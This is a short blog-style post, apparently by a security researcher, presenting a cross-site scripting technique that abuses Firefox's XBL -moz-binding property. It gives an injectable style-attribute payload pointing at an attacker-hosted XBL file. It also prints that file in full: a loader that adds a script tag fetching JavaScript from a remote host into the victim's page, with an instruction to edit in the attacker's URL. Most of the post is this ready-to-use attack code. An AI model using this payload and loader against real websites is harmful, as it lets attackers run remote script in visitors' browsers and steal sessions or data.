Today I wrote a simple tool to illustrate the binding of a Javascript document to a page using Firefox's XBL support (-moz-binding) in an XSS context.
The process works as follows:
- Inject attributes as follows (different encodings may be necessary): <element style = "-moz-binding:url('http://site.com/STXSS_XBL.xml#loader');" />.
- Browser loads XBL document.
- XBL document modifies DOM to include <script src="evil_script.js"/>.
- Browser loads and parses Javascript.
The required XBL document (STXSS_XBL.xml) is as follows:
<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl">
<binding id="loader">
<implementation>
<constructor>
<![CDATA[
//This is the STXSS XBL Loader
//Edit this line to the URL of the STXSS Javascript
var url = "http://www.your-site.com/STXSS_JS.js";
//Do not edit below this line
var scr = document.createElement("script");
scr.setAttribute("src",url);
var bodyElement = document.getElementsByTagName("html").item(0);
bodyElement.appendChild(scr);
]]>
</constructor>
</implementation>
</binding>
</bindings>